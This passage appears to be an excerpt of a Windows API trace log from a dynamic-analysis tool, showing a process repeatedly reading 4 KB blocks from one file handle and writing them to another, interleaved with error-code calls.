SetLastError (dwErrCode=0x0) [0091.303] GetLastError () returned 0x0 [0091.303] SetLastError (dwErrCode=0x0) [0091.303] GetLastError () returned 0x0 [0091.303] SetLastError (dwErrCode=0x0) [0091.303] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.303] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.303] GetLastError () returned 0x0 [0091.303] SetLastError (dwErrCode=0x0) [0091.303] GetLastError () returned 0x0 [0091.304] SetLastError (dwErrCode=0x0) [0091.304] GetLastError () returned 0x0 [0091.304] SetLastError (dwErrCode=0x0) [0091.304] GetLastError () returned 0x0 [0091.304] SetLastError (dwErrCode=0x0) [0091.304] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.304] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.304] GetLastError () returned 0x0 [0091.304] SetLastError (dwErrCode=0x0) [0091.304] GetLastError () returned 0x0 [0091.304] SetLastError (dwErrCode=0x0) [0091.304] GetLastError () returned 0x0 [0091.304] SetLastError (dwErrCode=0x0) [0091.304] GetLastError () returned 0x0 [0091.304] SetLastError (dwErrCode=0x0) [0091.304] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.304] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.305] GetLastError () returned 0x0 [0091.305] SetLastError (dwErrCode=0x0) [0091.305] GetLastError () returned 0x0 [0091.305] SetLastError (dwErrCode=0x0) [0091.305] GetLastError () returned 0x0 [0091.305] SetLastError (dwErrCode=0x0) [0091.305] GetLastError () returned 0x0 [0091.305] SetLastError (dwErrCode=0x0) [0091.305] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.305] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.305] GetLastError () returned 0x0 [0091.305] SetLastError (dwErrCode=0x0) [0091.305] GetLastError () returned 0x0 [0091.305] SetLastError (dwErrCode=0x0) [0091.305] GetLastError () returned 0x0 [0091.305] SetLastError (dwErrCode=0x0) [0091.305] GetLastError () returned 0x0 [0091.305] SetLastError (dwErrCode=0x0) [0091.305] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.305] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.306] GetLastError () returned 0x0 [0091.306] SetLastError (dwErrCode=0x0) [0091.306] GetLastError () returned 0x0 [0091.306] SetLastError (dwErrCode=0x0) [0091.306] GetLastError () returned 0x0 [0091.306] SetLastError (dwErrCode=0x0) [0091.306] GetLastError () returned 0x0 [0091.306] SetLastError (dwErrCode=0x0) [0091.306] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.306] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.306] GetLastError () returned 0x0 [0091.306] SetLastError (dwErrCode=0x0) [0091.306] GetLastError () returned 0x0 [0091.306] SetLastError (dwErrCode=0x0) [0091.306] GetLastError () returned 0x0 [0091.306] SetLastError (dwErrCode=0x0) [0091.306] GetLastError () returned 0x0 [0091.306] SetLastError (dwErrCode=0x0) [0091.306] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.307] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.307] GetLastError () returned 0x0 [0091.307] SetLastError (dwErrCode=0x0) [0091.307] GetLastError () returned 0x0 [0091.307] SetLastError (dwErrCode=0x0) [0091.307] GetLastError () returned 0x0 [0091.307] SetLastError (dwErrCode=0x0) [0091.307] GetLastError () returned 0x0 [0091.307] SetLastError (dwErrCode=0x0) [0091.307] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.307] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.307] GetLastError () returned 0x0 [0091.307] SetLastError (dwErrCode=0x0) [0091.307] GetLastError () returned 0x0 [0091.307] SetLastError (dwErrCode=0x0) [0091.307] GetLastError () returned 0x0 [0091.307] SetLastError (dwErrCode=0x0) [0091.307] GetLastError () returned 0x0 [0091.307] SetLastError (dwErrCode=0x0) [0091.307] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.308] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.308] GetLastError () returned 0x0 [0091.308] SetLastError (dwErrCode=0x0) [0091.308] GetLastError () returned 0x0 [0091.308] SetLastError (dwErrCode=0x0) [0091.308] GetLastError () returned 0x0 [0091.308] SetLastError (dwErrCode=0x0) [0091.308] GetLastError () returned 0x0 [0091.308] SetLastError (dwErrCode=0x0) [0091.308] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.308] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.309] GetLastError () returned 0x0 [0091.309] SetLastError (dwErrCode=0x0) [0091.309] GetLastError () returned 0x0 [0091.309] SetLastError (dwErrCode=0x0) [0091.309] GetLastError () returned 0x0 [0091.309] SetLastError (dwErrCode=0x0) [0091.309] GetLastError () returned 0x0 [0091.309] SetLastError (dwErrCode=0x0) [0091.309] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.309] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.309] GetLastError () returned 0x0 [0091.309] SetLastError (dwErrCode=0x0) [0091.309] GetLastError () returned 0x0 [0091.309] SetLastError (dwErrCode=0x0) [0091.310] GetLastError () returned 0x0 [0091.310] SetLastError (dwErrCode=0x0) [0091.310] GetLastError () returned 0x0 [0091.310] SetLastError (dwErrCode=0x0) [0091.310] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.310] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.310] GetLastError () returned 0x0 [0091.310] SetLastError (dwErrCode=0x0) [0091.310] GetLastError () returned 0x0 [0091.310] SetLastError (dwErrCode=0x0) [0091.310] GetLastError () returned 0x0 [0091.310] SetLastError (dwErrCode=0x0) [0091.310] GetLastError () returned 0x0 [0091.310] SetLastError (dwErrCode=0x0) [0091.310] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.310] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.310] GetLastError () returned 0x0 [0091.310] SetLastError (dwErrCode=0x0) [0091.311] GetLastError () returned 0x0 [0091.311] SetLastError (dwErrCode=0x0) [0091.311] GetLastError () returned 0x0 [0091.311] SetLastError (dwErrCode=0x0) [0091.311] GetLastError () returned 0x0 [0091.311] SetLastError (dwErrCode=0x0) [0091.311] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.311] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.311] GetLastError () returned 0x0 [0091.311] SetLastError (dwErrCode=0x0) [0091.311] GetLastError () returned 0x0 [0091.311] SetLastError (dwErrCode=0x0) [0091.311] GetLastError () returned 0x0 [0091.311] SetLastError (dwErrCode=0x0) [0091.311] GetLastError () returned 0x0 [0091.311] SetLastError (dwErrCode=0x0) [0091.311] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.311] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.311] GetLastError () returned 0x0 [0091.311] SetLastError (dwErrCode=0x0) [0091.312] GetLastError () returned 0x0 [0091.312] SetLastError (dwErrCode=0x0) [0091.312] GetLastError () returned 0x0 [0091.312] SetLastError (dwErrCode=0x0) [0091.312] GetLastError () returned 0x0 [0091.312] SetLastError (dwErrCode=0x0) [0091.312] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.312] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.312] GetLastError () returned 0x0 [0091.312] SetLastError (dwErrCode=0x0) [0091.312] GetLastError () returned 0x0 [0091.312] SetLastError (dwErrCode=0x0) [0091.312] GetLastError () returned 0x0 [0091.312] SetLastError (dwErrCode=0x0) [0091.312] GetLastError () returned 0x0 [0091.312] SetLastError (dwErrCode=0x0) [0091.312] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.312] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.312] GetLastError () returned 0x0 [0091.313] SetLastError (dwErrCode=0x0) [0091.313] GetLastError () returned 0x0 [0091.313] SetLastError (dwErrCode=0x0) [0091.313] GetLastError () returned 0x0 [0091.313] SetLastError (dwErrCode=0x0) [0091.313] GetLastError () returned 0x0 [0091.313] SetLastError (dwErrCode=0x0) [0091.313] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.313] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.313] GetLastError () returned 0x0 [0091.313] SetLastError (dwErrCode=0x0) [0091.313] GetLastError () returned 0x0 [0091.313] SetLastError (dwErrCode=0x0) [0091.313] GetLastError () returned 0x0 [0091.313] SetLastError (dwErrCode=0x0) [0091.313] GetLastError () returned 0x0 [0091.313] SetLastError (dwErrCode=0x0) [0091.313] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.313] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.314] GetLastError () returned 0x0 [0091.314] SetLastError (dwErrCode=0x0) [0091.314] GetLastError () returned 0x0 [0091.314] SetLastError (dwErrCode=0x0) [0091.314] GetLastError () returned 0x0 [0091.314] SetLastError (dwErrCode=0x0) [0091.314] GetLastError () returned 0x0 [0091.314] SetLastError (dwErrCode=0x0) [0091.314] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.314] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.314] GetLastError () returned 0x0 [0091.314] SetLastError (dwErrCode=0x0) [0091.314] GetLastError () returned 0x0 [0091.314] SetLastError (dwErrCode=0x0) [0091.314] GetLastError () returned 0x0 [0091.314] SetLastError (dwErrCode=0x0) [0091.314] GetLastError () returned 0x0 [0091.314] SetLastError (dwErrCode=0x0) [0091.314] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.314] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.315] GetLastError () returned 0x0 [0091.315] SetLastError (dwErrCode=0x0) [0091.315] GetLastError () returned 0x0 [0091.315] SetLastError (dwErrCode=0x0) [0091.315] GetLastError () returned 0x0 [0091.315] SetLastError (dwErrCode=0x0) [0091.315] GetLastError () returned 0x0 [0091.315] SetLastError (dwErrCode=0x0) [0091.315] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.315] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.315] GetLastError () returned 0x0 [0091.315] SetLastError (dwErrCode=0x0) [0091.315] GetLastError () returned 0x0 [0091.347] SetLastError (dwErrCode=0x0) [0091.347] GetLastError () returned 0x0 [0091.347] SetLastError (dwErrCode=0x0) [0091.347] GetLastError () returned 0x0 [0091.347] SetLastError (dwErrCode=0x0) [0091.347] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.347] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.348] GetLastError () returned 0x0 [0091.348] SetLastError (dwErrCode=0x0) [0091.348] GetLastError () returned 0x0 [0091.348] SetLastError (dwErrCode=0x0) [0091.348] GetLastError () returned 0x0 [0091.348] SetLastError (dwErrCode=0x0) [0091.348] GetLastError () returned 0x0 [0091.348] SetLastError (dwErrCode=0x0) [0091.348] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.348] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.349] GetLastError () returned 0x0 [0091.349] SetLastError (dwErrCode=0x0) [0091.349] GetLastError () returned 0x0 [0091.349] SetLastError (dwErrCode=0x0) [0091.349] GetLastError () returned 0x0 [0091.349] SetLastError (dwErrCode=0x0) [0091.349] GetLastError () returned 0x0 [0091.349] SetLastError (dwErrCode=0x0) [0091.349] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.349] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.349] GetLastError () returned 0x0 [0091.349] SetLastError (dwErrCode=0x0) [0091.349] GetLastError () returned 0x0 [0091.349] SetLastError (dwErrCode=0x0) [0091.349] GetLastError () returned 0x0 [0091.349] SetLastError (dwErrCode=0x0) [0091.349] GetLastError () returned 0x0 [0091.349] SetLastError (dwErrCode=0x0) [0091.349] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.350] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.350] GetLastError () returned 0x0 [0091.350] SetLastError (dwErrCode=0x0) [0091.350] GetLastError () returned 0x0 [0091.350] SetLastError (dwErrCode=0x0) [0091.350] GetLastError () returned 0x0 [0091.350] SetLastError (dwErrCode=0x0) [0091.350] GetLastError () returned 0x0 [0091.350] SetLastError (dwErrCode=0x0) [0091.350] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.350] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.350] GetLastError () returned 0x0 [0091.350] SetLastError (dwErrCode=0x0) [0091.350] GetLastError () returned 0x0 [0091.350] SetLastError (dwErrCode=0x0) [0091.350] GetLastError () returned 0x0 [0091.350] SetLastError (dwErrCode=0x0) [0091.350] GetLastError () returned 0x0 [0091.350] SetLastError (dwErrCode=0x0) [0091.350] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.351] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.351] GetLastError () returned 0x0 [0091.351] SetLastError (dwErrCode=0x0) [0091.351] GetLastError () returned 0x0 [0091.351] SetLastError (dwErrCode=0x0) [0091.351] GetLastError () returned 0x0 [0091.351] SetLastError (dwErrCode=0x0) [0091.351] GetLastError () returned 0x0 [0091.351] SetLastError (dwErrCode=0x0) [0091.351] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.351] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.351] GetLastError () returned 0x0 [0091.351] SetLastError (dwErrCode=0x0) [0091.351] GetLastError () returned 0x0 [0091.351] SetLastError (dwErrCode=0x0) [0091.351] GetLastError () returned 0x0 [0091.351] SetLastError (dwErrCode=0x0) [0091.351] GetLastError () returned 0x0 [0091.351] SetLastError (dwErrCode=0x0) [0091.351] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.352] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.352] GetLastError () returned 0x0 [0091.352] SetLastError (dwErrCode=0x0) [0091.352] GetLastError () returned 0x0 [0091.352] SetLastError (dwErrCode=0x0) [0091.352] GetLastError () returned 0x0 [0091.352] SetLastError (dwErrCode=0x0) [0091.352] GetLastError () returned 0x0 [0091.352] SetLastError (dwErrCode=0x0) [0091.352] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.352] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.352] GetLastError () returned 0x0 [0091.352] SetLastError (dwErrCode=0x0) [0091.352] GetLastError () returned 0x0 [0091.352] SetLastError (dwErrCode=0x0) [0091.352] GetLastError () returned 0x0 [0091.352] SetLastError (dwErrCode=0x0) [0091.353] GetLastError () returned 0x0 [0091.353] SetLastError (dwErrCode=0x0) [0091.353] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.353] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.353] GetLastError () returned 0x0 [0091.353] SetLastError (dwErrCode=0x0) [0091.353] GetLastError () returned 0x0 [0091.353] SetLastError (dwErrCode=0x0) [0091.353] GetLastError () returned 0x0 [0091.353] SetLastError (dwErrCode=0x0) [0091.353] GetLastError () returned 0x0 [0091.353] SetLastError (dwErrCode=0x0) [0091.353] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, 